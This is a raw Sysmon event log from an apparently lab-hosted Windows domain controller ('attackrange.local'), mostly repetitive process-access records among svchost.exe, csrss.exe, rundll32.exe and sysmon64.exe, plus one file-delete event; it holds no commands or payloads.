12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.246{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.246{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.246{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.230{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.230{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.230{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 